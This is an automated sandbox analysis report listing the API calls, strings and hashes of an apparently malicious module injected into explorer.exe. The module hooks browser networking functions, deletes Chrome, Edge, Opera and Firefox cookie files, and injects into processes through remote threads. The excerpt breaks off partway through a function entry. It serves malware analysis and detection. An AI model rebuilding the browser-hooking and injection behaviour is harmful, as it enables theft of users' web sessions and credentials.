GetModuleHandleA.KERNEL32(wininet.dll,HttpQueryInfoA), ref: 00083B99
GetProcAddress.KERNEL32(00000000), ref: 00083B9C
GetModuleHandleA.KERNEL32(wininet.dll,InternetQueryOptionA), ref: 00083BA9
GetProcAddress.KERNEL32(00000000), ref: 00083BAC
GetModuleHandleA.KERNEL32(wininet.dll,InternetGetCookieA), ref: 00083BB9
GetProcAddress.KERNEL32(00000000), ref: 00083BBC

Part of subcall function 00081C08: RtlMoveMemory.NTDLL(00000000,?,00000000), ref: 00081C42

RtlExitUserThread.NTDLL(00000000), ref: 00083BD9
wsprintfA.USER32 ref: 00083C1F
CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00083C69
Process32First.KERNEL32(00000000,?), ref: 00083C88
CloseHandle.KERNEL32(00000000), ref: 00083D77
Sleep.KERNELBASE(000003E8), ref: 00083D82

Strings

HttpSendRequestW, xrefs: 00083B4C
InternetGetCookieA, xrefs: 00083BAE
wininet.dll, xrefs: 00083B21, 00083B2B, 00083B51, 00083B71, 00083B98, 00083BA3, 00083BB3
msedge.exe, xrefs: 00083A2A
chrome.dll, xrefs: 00083A81
chrome.exe, xrefs: 00083A67
%s%s, xrefs: 00083C19
VirtualQuery, xrefs: 00083974
msedge.dll, xrefs: 00083A50
%s%d%d%d, xrefs: 000838B0
NetworkService, xrefs: 00083A42, 00083A73, 00083A98
opera.dll, xrefs: 00083AB0
InternetQueryOptionA, xrefs: 00083B9E
InternetWriteFile, xrefs: 00083B6C
PR_Write, xrefs: 000839D6, 000839DB, 000839EA
nss3.dll, xrefs: 000839B9, 000839C3, 000839EB
nspr4.dll, xrefs: 000839AA, 000839DC
microsoftedgecp.exe, xrefs: 00083A1A
iexplore.exe, xrefs: 00083A0A
HttpQueryInfoA, xrefs: 00083B93
opera_browser.dll, xrefs: 00083AC7
HttpSendRequestA, xrefs: 00083B26
firefox.exe, xrefs: 00083936
opera.exe, xrefs: 00083A88
PR_GetDescType, xrefs: 000839A4, 000839A9, 000839C2
fgclearcookies, xrefs: 00083C3D
kernel32.dll, xrefs: 00083979

Memory Dump Source

Source File: 00000016.00000002.605265632.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_81000_explorer.jbxd

Similarity

API ID: Handle$Module$AddressProc$Cryptlstrcmpi$CommandLine$CreateHash$CurrentProcesswsprintf$CloseContextFileFirstHeapNameSleepSnapshotThreadToolhelp32$AcquireAllocateArgvCriticalDataDestroyErrorExitFindInitializeLastMemoryMoveMutexParamPathProcess32ReleaseSectionThread32Userlstrcatlstrlen
String ID: %s%d%d%d$%s%s$HttpQueryInfoA$HttpSendRequestA$HttpSendRequestW$InternetGetCookieA$InternetQueryOptionA$InternetWriteFile$NetworkService$PR_GetDescType$PR_Write$VirtualQuery$chrome.dll$chrome.exe$fgclearcookies$firefox.exe$iexplore.exe$kernel32.dll$microsoftedgecp.exe$msedge.dll$msedge.exe$nspr4.dll$nss3.dll$opera.dll$opera.exe$opera_browser.dll$wininet.dll
API String ID: 2480436012-2618538661
Opcode ID: b9f6ff7a843870f369ebe3c7313e7c28a896d86895adef5c6821e2817a989fd5
Instruction ID: 4080beb071130776e6dd09e7f3c374191be514a04634faf7e68f9b4ce61aff03
Opcode Fuzzy Hash: b9f6ff7a843870f369ebe3c7313e7c28a896d86895adef5c6821e2817a989fd5
Instruction Fuzzy Hash: AEA1D370A40716A7E71077719C49E6F3A9CBF91B41B120524F6C1AB292EF79C9028FA6

Function 000815BE Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 87
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00081000: GetProcessHeap.KERNEL32(00000008,00000208,00081418), ref: 00081003
Part of subcall function 00081000: RtlAllocateHeap.NTDLL(00000000), ref: 0008100A

PathCombineW.SHLWAPI(00000000,00000000,*.*), ref: 000815EB
FindFirstFileW.KERNELBASE(00000000,?), ref: 000815F7
lstrcmpiW.KERNEL32(?,000841C8), ref: 00081623
lstrcmpiW.KERNEL32(?,000841CC), ref: 00081633
PathCombineW.SHLWAPI(00000000,?,?), ref: 0008164C
PathMatchSpecW.SHLWAPI(?,Cookies*), ref: 00081661
PathCombineW.SHLWAPI(00000000,?,?), ref: 0008167E
FindNextFileW.KERNEL32(00000000,00000010), ref: 0008169C
FindClose.KERNELBASE(00000000), ref: 000816AB

Strings

*.*, xrefs: 000815DE
Cookies*, xrefs: 0008165F

Memory Dump Source

Source File: 00000016.00000002.605265632.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_81000_explorer.jbxd

Similarity

API ID: Path$CombineFind$FileHeaplstrcmpi$AllocateCloseFirstMatchNextProcessSpec
String ID: *.*$Cookies*
API String ID: 4256701249-3228320225
Opcode ID: de4fde3954acede6bbaa2663d65d846f994a8c3001a9ee01889cae48822a856e
Instruction ID: 8b79dbc0752a28f5ad1f1006910a533587f018e208c1d15e1b3a33415b5554fa
Opcode Fuzzy Hash: de4fde3954acede6bbaa2663d65d846f994a8c3001a9ee01889cae48822a856e
Instruction Fuzzy Hash: 832167712043169BD710BB60AC84ABF7BDCBF89795F040529FAC5D3241EB78DD464BA2

Function 000814D8 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 70
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 000813FE: wsprintfW.USER32 ref: 0008142A
Part of subcall function 000813FE: FindFirstFileW.KERNELBASE(00000000,?), ref: 00081439
Part of subcall function 000813FE: wsprintfW.USER32 ref: 00081476
Part of subcall function 000813FE: RemoveDirectoryW.KERNEL32(00000000), ref: 0008149C
Part of subcall function 000813FE: FindNextFileW.KERNELBASE(00000000,00000010), ref: 000814AF
Part of subcall function 000813FE: FindClose.KERNEL32(00000000), ref: 000814BA

Part of subcall function 00081000: GetProcessHeap.KERNEL32(00000008,00000208,00081418), ref: 00081003
Part of subcall function 00081000: RtlAllocateHeap.NTDLL(00000000), ref: 0008100A

wsprintfW.USER32 ref: 0008150D
FindFirstFileW.KERNELBASE(00000000,?), ref: 0008151C
wsprintfW.USER32 ref: 00081557
SetFileAttributesW.KERNEL32(00000000,00000020), ref: 0008156A
DeleteFileW.KERNELBASE(00000000), ref: 00081571
FindNextFileW.KERNELBASE(00000000,00000010), ref: 00081584
FindClose.KERNELBASE(00000000), ref: 0008158F

Strings

*.*, xrefs: 000814FB
%s%s, xrefs: 00081503, 00081551

Memory Dump Source

Source File: 00000016.00000002.605265632.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_81000_explorer.jbxd

Similarity

API ID: FileFind$wsprintf$CloseFirstHeapNext$AllocateAttributesDeleteDirectoryProcessRemove
String ID: %s%s$*.*
API String ID: 2055899612-705776850
Opcode ID: 80c984e5e7019e95e716a10583bb4acde58effe50df50ecf44e95ac5e90c50b4
Instruction ID: 5bb26f6c1dc7bd09f101a8d25e391cda339d68d8b89c612bbdf1b72f2cef919b
Opcode Fuzzy Hash: 80c984e5e7019e95e716a10583bb4acde58effe50df50ecf44e95ac5e90c50b4
Instruction Fuzzy Hash: 1F11B7312007055BE310BB649C49AEF7BDCFF95755F000519FED2922D3EB788A4687A6

Function 000813FE Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 69
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00081000: GetProcessHeap.KERNEL32(00000008,00000208,00081418), ref: 00081003
Part of subcall function 00081000: RtlAllocateHeap.NTDLL(00000000), ref: 0008100A

wsprintfW.USER32 ref: 0008142A
FindFirstFileW.KERNELBASE(00000000,?), ref: 00081439
wsprintfW.USER32 ref: 00081476

Part of subcall function 000814D8: wsprintfW.USER32 ref: 0008150D
Part of subcall function 000814D8: FindFirstFileW.KERNELBASE(00000000,?), ref: 0008151C
Part of subcall function 000814D8: wsprintfW.USER32 ref: 00081557
Part of subcall function 000814D8: SetFileAttributesW.KERNEL32(00000000,00000020), ref: 0008156A
Part of subcall function 000814D8: DeleteFileW.KERNELBASE(00000000), ref: 00081571
Part of subcall function 000814D8: FindNextFileW.KERNELBASE(00000000,00000010), ref: 00081584
Part of subcall function 000814D8: FindClose.KERNELBASE(00000000), ref: 0008158F

RemoveDirectoryW.KERNEL32(00000000), ref: 0008149C
FindNextFileW.KERNELBASE(00000000,00000010), ref: 000814AF
FindClose.KERNEL32(00000000), ref: 000814BA

Strings

*.*, xrefs: 00081418
%s%s\, xrefs: 00081470
%s%s, xrefs: 00081420

Memory Dump Source

Source File: 00000016.00000002.605265632.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_81000_explorer.jbxd

Similarity

API ID: FileFind$wsprintf$CloseFirstHeapNext$AllocateAttributesDeleteDirectoryProcessRemove
String ID: %s%s$%s%s\$*.*
API String ID: 2055899612-4093207852
Opcode ID: 6c666cde7a4b1b00ec48c3d571aa591b656f76482338ac601443b2c5c9d93ac3
Instruction ID: 7a152c0ea108eeacf04616a90babe5037b3a522f46ac4564a06091ccefb20d83
Opcode Fuzzy Hash: 6c666cde7a4b1b00ec48c3d571aa591b656f76482338ac601443b2c5c9d93ac3
Instruction Fuzzy Hash: D21190302043416BE710BB25EC49AFF76DCFFD5355F000529FAC192292DB79484A8B62

Function 00083D8D Relevance: 4.5, APIs: 3, Instructions: 46
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00081274: VirtualQuery.KERNEL32(?,?,0000001C), ref: 00081281

Part of subcall function 00081000: GetProcessHeap.KERNEL32(00000008,00000208,00081418), ref: 00081003
Part of subcall function 00081000: RtlAllocateHeap.NTDLL(00000000), ref: 0008100A

RtlMoveMemory.NTDLL(00000000,?,00000363), ref: 00083DAF
RtlMoveMemory.NTDLL(00000000,?,?), ref: 00083DE2
NtUnmapViewOfSection.NTDLL(000000FF), ref: 00083DEB

Memory Dump Source

Source File: 00000016.00000002.605265632.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_81000_explorer.jbxd

Similarity

API ID: HeapMemoryMove$AllocateProcessQuerySectionUnmapViewVirtual
String ID:
API String ID: 4050682147-0
Opcode ID: 0bdd0153c5d571ba371ff687eaf063fdcaa43c021457fa3483b6ad3aa1bdb115
Instruction ID: dcd502424e309425fe8eb10f29b26712ba654105e7724c8cb1046160188aa2ce
Opcode Fuzzy Hash: 0bdd0153c5d571ba371ff687eaf063fdcaa43c021457fa3483b6ad3aa1bdb115
Instruction Fuzzy Hash: 4301D430400601AFDB28BB64EC58BEB3B9CFF85711F118529B5D6871E2CA7B8A41CF65

Function 00083709 Relevance: 28.1, APIs: 9, Strings: 7, Instructions: 73
stringsleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00081363: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00081374
Part of subcall function 00081363: Process32First.KERNEL32(00000000,?), ref: 00081393
Part of subcall function 00081363: CloseHandle.KERNELBASE(00000000), ref: 000813CB

Part of subcall function 00081363: lstrcmpi.KERNEL32(?), ref: 000813A3
Part of subcall function 00081363: Process32Next.KERNEL32(00000000,00000128), ref: 000813C0

Sleep.KERNELBASE(000003E8,?,00000000,00000001,?,?,00083839,?,00083C53,00000001), ref: 00083731

Part of subcall function 00081000: GetProcessHeap.KERNEL32(00000008,00000208,00081418), ref: 00081003
Part of subcall function 00081000: RtlAllocateHeap.NTDLL(00000000), ref: 0008100A

SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001C,00000000), ref: 00083752
lstrcatW.KERNEL32(00000000,\Google\Chrome\User Data\), ref: 00083764

Part of subcall function 000815BE: PathCombineW.SHLWAPI(00000000,00000000,*.*), ref: 000815EB
Part of subcall function 000815BE: FindFirstFileW.KERNELBASE(00000000,?), ref: 000815F7
Part of subcall function 000815BE: lstrcmpiW.KERNEL32(?,000841C8), ref: 00081623
Part of subcall function 000815BE: lstrcmpiW.KERNEL32(?,000841CC), ref: 00081633
Part of subcall function 000815BE: PathCombineW.SHLWAPI(00000000,?,?), ref: 0008164C
Part of subcall function 000815BE: FindNextFileW.KERNEL32(00000000,00000010), ref: 0008169C
Part of subcall function 000815BE: FindClose.KERNELBASE(00000000), ref: 000816AB

RtlZeroMemory.NTDLL(00000000,00001000), ref: 0008377A
SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001C,00000000), ref: 00083783
lstrcatW.KERNEL32(00000000,\Microsoft\Edge\User Data\), ref: 0008378F
RtlZeroMemory.NTDLL(00000000,00001000), ref: 000837A3
SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001A,00000000), ref: 000837AC
lstrcatW.KERNEL32(00000000,\Opera Software\Opera Stable\), ref: 000837B8

Strings

\Opera Software\Opera Stable\, xrefs: 000837B2
\Google\Chrome\User Data\, xrefs: 0008375E
msedge.exe, xrefs: 00083722
\Microsoft\Edge\User Data\, xrefs: 00083789
opera.exe, xrefs: 00083718
chrome.exe, xrefs: 0008370E
Cookies*, xrefs: 00083766, 00083791, 000837BA

Memory Dump Source

Source File: 00000016.00000002.605265632.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_81000_explorer.jbxd

Similarity

API ID: Path$FindFolderSpeciallstrcatlstrcmpi$CloseCombineFileFirstHeapMemoryNextProcess32Zero$AllocateCreateHandleProcessSleepSnapshotToolhelp32
String ID: Cookies*$\Google\Chrome\User Data\$\Microsoft\Edge\User Data\$\Opera Software\Opera Stable\$chrome.exe$msedge.exe$opera.exe
API String ID: 909495591-1175993956
Opcode ID: 75eec38487de135512deb4f16878f409bbec5ecf34d88790fb36fbef8542c3dd
Instruction ID: ec7ff4d470ff25c577ac56c1694f62454c323dd216fa13f948d3d90517649557
Opcode Fuzzy Hash: 75eec38487de135512deb4f16878f409bbec5ecf34d88790fb36fbef8542c3dd
Instruction Fuzzy Hash: 7011027034571632F22033615C82FEF258DFFA6BA1F100024F2C56A2C2DED89E0247AA

Function 00083BE1 Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 130
stringsleepprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00081000: GetProcessHeap.KERNEL32(00000008,00000208,00081418), ref: 00081003
Part of subcall function 00081000: RtlAllocateHeap.NTDLL(00000000), ref: 0008100A

wsprintfA.USER32 ref: 00083C1F

Part of subcall function 00081235: OpenFileMappingA.KERNEL32(00000006,00000000,00000000), ref: 0008123F
Part of subcall function 00081235: MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000,?,00000000,00083C33), ref: 00081251

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00083C69
Process32First.KERNEL32(00000000,?), ref: 00083C88
lstrcmpi.KERNEL32(?,firefox.exe), ref: 00083CA1
lstrcmpi.KERNEL32(?,iexplore.exe), ref: 00083CB1
lstrcmpi.KERNEL32(?,microsoftedgecp.exe), ref: 00083CC1
lstrcmpi.KERNEL32(?,microsoftedgecp.exe), ref: 00083D12
Process32Next.KERNEL32(00000000,00000128), ref: 00083D68
CloseHandle.KERNEL32(00000000), ref: 00083D77
Sleep.KERNELBASE(000003E8), ref: 00083D82

Part of subcall function 00081141: lstrlen.KERNEL32(?,?,?,00000000,?,000829DD,00000001), ref: 00081150
Part of subcall function 00081141: lstrlen.KERNEL32(:method POST,?,00000000,?,000829DD,00000001), ref: 00081155

Strings

iexplore.exe, xrefs: 00083A0A, 00083CA7
firefox.exe, xrefs: 00083936, 00083C9B
microsoftedgecp.exe, xrefs: 00083A1A, 00083CB7, 00083D08
%s%s, xrefs: 00083C19
fgclearcookies, xrefs: 00083C3D

Memory Dump Source

Source File: 00000016.00000002.605265632.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_81000_explorer.jbxd

Similarity

API ID: lstrcmpi$FileHeapProcess32lstrlen$AllocateCloseCreateFirstHandleMappingNextOpenProcessSleepSnapshotToolhelp32Viewwsprintf
String ID: %s%s$fgclearcookies$firefox.exe$iexplore.exe$microsoftedgecp.exe
API String ID: 2509890648-2554907557
Opcode ID: 0d0ddd3babe7951f4962b83fe7927ab9f7e6e2b6a7115e594057a30b113bad32
Instruction ID: b3decc60f1b6fd0102e2c0e98a0bf13bb15c07833eab530b9c5dae2245e78d24
Opcode Fuzzy Hash: 0d0ddd3babe7951f4962b83fe7927ab9f7e6e2b6a7115e594057a30b113bad32
Instruction Fuzzy Hash: AF41E6316047029BD614BB74EC45ABF37ADBF94B40F000518B9D297192EF39DE068BA6

Function 000835D4 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 64
stringsleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00081363: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00081374
Part of subcall function 00081363: Process32First.KERNEL32(00000000,?), ref: 00081393
Part of subcall function 00081363: CloseHandle.KERNELBASE(00000000), ref: 000813CB

Part of subcall function 00081363: lstrcmpi.KERNEL32(?), ref: 000813A3
Part of subcall function 00081363: Process32Next.KERNEL32(00000000,00000128), ref: 000813C0

Sleep.KERNELBASE(000003E8,?,00000000,?,0008382F,?,00083C53,00000001), ref: 000835FA

Part of subcall function 00081000: GetProcessHeap.KERNEL32(00000008,00000208,00081418), ref: 00081003
Part of subcall function 00081000: RtlAllocateHeap.NTDLL(00000000), ref: 0008100A

SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001C,00000000), ref: 00083613
lstrcatW.KERNEL32(00000000,\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\), ref: 00083623
wsprintfW.USER32 ref: 00083644

Part of subcall function 000814D8: wsprintfW.USER32 ref: 0008150D
Part of subcall function 000814D8: FindFirstFileW.KERNELBASE(00000000,?), ref: 0008151C
Part of subcall function 000814D8: wsprintfW.USER32 ref: 00081557
Part of subcall function 000814D8: SetFileAttributesW.KERNEL32(00000000,00000020), ref: 0008156A
Part of subcall function 000814D8: DeleteFileW.KERNELBASE(00000000), ref: 00081571
Part of subcall function 000814D8: FindNextFileW.KERNELBASE(00000000,00000010), ref: 00081584
Part of subcall function 000814D8: FindClose.KERNELBASE(00000000), ref: 0008158F

Part of subcall function 00081011: GetProcessHeap.KERNEL32(00000000,00000000,00000000,000814CB), ref: 00081020
Part of subcall function 00081011: HeapFree.KERNEL32(00000000), ref: 00081027

SHGetSpecialFolderPathW.SHELL32(00000000,00000000,00000021,00000000), ref: 00083672
lstrcatW.KERNEL32(00000000,00084614), ref: 00083682

Strings

microsoftedge.exe, xrefs: 000835E1
iexplore.exe, xrefs: 000835D7
*.*, xrefs: 0008364D, 0008368B
%s%s, xrefs: 0008363E
\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\, xrefs: 0008361D
microsoftedgecp.exe, xrefs: 000835EB

Memory Dump Source

Source File: 00000016.00000002.605265632.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_81000_explorer.jbxd

Similarity

API ID: FileHeap$Findwsprintf$CloseFirstFolderNextPathProcessProcess32Speciallstrcat$AllocateAttributesCreateDeleteFreeHandleSleepSnapshotToolhelp32lstrcmpi
String ID: %s%s$*.*$\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\$iexplore.exe$microsoftedge.exe$microsoftedgecp.exe
API String ID: 2436889709-3669280581
Opcode ID: fadd14bf89c54f29c561035e25b94334a211fe8576a283e6ce8d90d0ce59f8af
Instruction ID: 047cd47d4e76235a8978023a5c5691358bac471f200d8a84fde17aeb494bc27d
Opcode Fuzzy Hash: fadd14bf89c54f29c561035e25b94334a211fe8576a283e6ce8d90d0ce59f8af
Instruction Fuzzy Hash: 6F11703034060277FA143765AC9EFBE2599FFD6F42F150028B7C6AA2C2DE9849825769

Function 000836A1 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 37
sleepstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00081363: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00081374
Part of subcall function 00081363: Process32First.KERNEL32(00000000,?), ref: 00081393
Part of subcall function 00081363: CloseHandle.KERNELBASE(00000000), ref: 000813CB

Sleep.KERNELBASE(000003E8,?,00000000,?,00083834,?,00083C53,00000001), ref: 000836B3

Part of subcall function 00081000: GetProcessHeap.KERNEL32(00000008,00000208,00081418), ref: 00081003
Part of subcall function 00081000: RtlAllocateHeap.NTDLL(00000000), ref: 0008100A

SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001A,00000000), ref: 000836CC
lstrcatW.KERNEL32(00000000,\Mozilla\Firefox\Profiles\), ref: 000836DC

Part of subcall function 000814D8: wsprintfW.USER32 ref: 0008150D
Part of subcall function 000814D8: FindFirstFileW.KERNELBASE(00000000,?), ref: 0008151C
Part of subcall function 000814D8: wsprintfW.USER32 ref: 00081557
Part of subcall function 000814D8: SetFileAttributesW.KERNEL32(00000000,00000020), ref: 0008156A
Part of subcall function 000814D8: DeleteFileW.KERNELBASE(00000000), ref: 00081571
Part of subcall function 000814D8: FindNextFileW.KERNELBASE(00000000,00000010), ref: 00081584
Part of subcall function 000814D8: FindClose.KERNELBASE(00000000), ref: 0008158F

Strings

sessionstore.*, xrefs: 000836F2
firefox.exe, xrefs: 000836A4
\Mozilla\Firefox\Profiles\, xrefs: 000836D6
cookies.sqlite, xrefs: 000836E4

Memory Dump Source

Source File: 00000016.00000002.605265632.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_81000_explorer.jbxd

Similarity

API ID: File$Find$CloseFirstHeapwsprintf$AllocateAttributesCreateDeleteFolderHandleNextPathProcessProcess32SleepSnapshotSpecialToolhelp32lstrcat
String ID: \Mozilla\Firefox\Profiles\$cookies.sqlite$firefox.exe$sessionstore.*
API String ID: 2731919298-637609321
Opcode ID: 624656e6605f4b987df5a12e8ae5b15f913b8e14c12c72c41ec1462b20f1c9d9
Instruction ID: e4b6859fe632719e62c2471a373af4e41d7e2c2c30c1e964f33e307738a03490
Opcode Fuzzy Hash: 624656e6605f4b987df5a12e8ae5b15f913b8e14c12c72c41ec1462b20f1c9d9
Instruction Fuzzy Hash: A4F0A731300512339615336AAC0EDEF195DFFD7B52700012CB2C6962D2DE980943577A

Function 00081363 Relevance: 7.5, APIs: 5, Instructions: 39
processstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00081374
Process32First.KERNEL32(00000000,?), ref: 00081393
lstrcmpi.KERNEL32(?), ref: 000813A3
Process32Next.KERNEL32(00000000,00000128), ref: 000813C0
CloseHandle.KERNELBASE(00000000), ref: 000813CB

Memory Dump Source

Source File: 00000016.00000002.605265632.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_81000_explorer.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcmpi
String ID:
API String ID: 868014591-0
Opcode ID: 73177a2627c4fc77625abdc81e2021d595d42a0398085b95e880686d4ba7af21
Instruction ID: f597f1abedfdb78b4a50bf3d8acbfe31b34690e914edc3f9a8282d2ed78ac4e0
Opcode Fuzzy Hash: 73177a2627c4fc77625abdc81e2021d595d42a0398085b95e880686d4ba7af21
Instruction Fuzzy Hash: 34F0C8315011149BE7706B25AC08BDF7BBCFF09321F0001A0F9D9E2190EB784E558F91

Function 00081235 Relevance: 3.0, APIs: 2, Instructions: 23
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OpenFileMappingA.KERNEL32(00000006,00000000,00000000), ref: 0008123F
MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000,?,00000000,00083C33), ref: 00081251

Memory Dump Source

Source File: 00000016.00000002.605265632.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_81000_explorer.jbxd

Similarity

API ID: File$MappingOpenView
String ID:
API String ID: 3439327939-0
Opcode ID: 2b55954cab2d3ab23cb26bdc3426ab0b4883f1f8e4826569a64c97ab8e8399a0
Instruction ID: 31edbaac02ff07a1b824ab005dc06848c6bb7be7fdd6de8e3064e283bb2ae97a
Opcode Fuzzy Hash: 2b55954cab2d3ab23cb26bdc3426ab0b4883f1f8e4826569a64c97ab8e8399a0
Instruction Fuzzy Hash: 5ED017327052327BE3706ABB6C0CF836EDDEF86AE1B014025B649D2150D6608821C7F0

Function 00081000 Relevance: 3.0, APIs: 2, Instructions: 6
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32(00000008,00000208,00081418), ref: 00081003
RtlAllocateHeap.NTDLL(00000000), ref: 0008100A

Memory Dump Source

Source File: 00000016.00000002.605265632.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_81000_explorer.jbxd

Similarity

API ID: Heap$AllocateProcess
String ID:
API String ID: 1357844191-0
Opcode ID: b94d352eba827c55e13339f87e9f3a43d9d04c7acd40f655af300f4012798e7b
Instruction ID: 4deb57588eb96029a35becf2c55eca230ebc00b67c115c5e18b133d903a3b778
Opcode Fuzzy Hash: b94d352eba827c55e13339f87e9f3a43d9d04c7acd40f655af300f4012798e7b
Instruction Fuzzy Hash: 0EA002B59501115BFE4457E4BD0DB173518B744745F248544738685050A97854148F21

Function 00081011 Relevance: 2.5, APIs: 2, Instructions: 12
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00081274: VirtualQuery.KERNEL32(?,?,0000001C), ref: 00081281

GetProcessHeap.KERNEL32(00000000,00000000,00000000,000814CB), ref: 00081020
HeapFree.KERNEL32(00000000), ref: 00081027

Memory Dump Source

Source File: 00000016.00000002.605265632.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_81000_explorer.jbxd

Similarity

API ID: Heap$FreeProcessQueryVirtual
String ID:
API String ID: 2580854192-0
Opcode ID: 5f42877d8e3920b7bfd873553e3772e2c12dbafe832c0d2951b5b4260f378939
Instruction ID: 73dac1b4d99c4d0101d6bf60127167cb710a494476b2b1900cddaa98e4698dba
Opcode Fuzzy Hash: 5f42877d8e3920b7bfd873553e3772e2c12dbafe832c0d2951b5b4260f378939
Instruction Fuzzy Hash: CCC08C3180426096DA6037E03C0CBC72A0CBF09251F040641B68492082CAB888168BA0

Non-executed Functions

Function 00081FE5 Relevance: 45.7, APIs: 23, Strings: 3, Instructions: 208
injectionnativesleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00081274: VirtualQuery.KERNEL32(?,?,0000001C), ref: 00081281

OpenProcess.KERNEL32(001FFFFF,00000000,?,00000000,?,00000001,756F3E2E), ref: 0008201A
NtSetInformationProcess.NTDLL(00000000,00000034,?), ref: 00082055
NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 000820E5
RtlMoveMemory.NTDLL(00000000,000850A0,00000016), ref: 0008210C
RtlMoveMemory.NTDLL(-00000016,00000363), ref: 00082134
NtUnmapViewOfSection.NTDLL(000000FF,-00000016), ref: 00082144
CreateMutexA.KERNEL32(00000000,00000000,opera_shared_counter), ref: 0008215E
GetLastError.KERNEL32 ref: 00082166
CloseHandle.KERNEL32(00000000), ref: 00082174
Sleep.KERNEL32(000003E8), ref: 0008217B
GetModuleHandleA.KERNEL32(ntdll,atan), ref: 00082191
GetProcAddress.KERNEL32(00000000), ref: 00082198
ReadProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 000821AE
WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 000821D8
CreateRemoteThread.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 000821EB
CloseHandle.KERNEL32(00000000), ref: 000821F2
Sleep.KERNEL32(000001F4), ref: 000821F9
WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 0008220D
CreateRemoteThread.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00082224
CloseHandle.KERNEL32(00000000), ref: 00082231
CloseHandle.KERNEL32(?), ref: 00082237
CloseHandle.KERNEL32(?), ref: 0008223D
CloseHandle.KERNEL32(00000000), ref: 00082240

Strings

ntdll, xrefs: 0008218C
opera_shared_counter, xrefs: 00082157
atan, xrefs: 00082187

Memory Dump Source

Source File: 00000016.00000002.605265632.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_81000_explorer.jbxd

Similarity

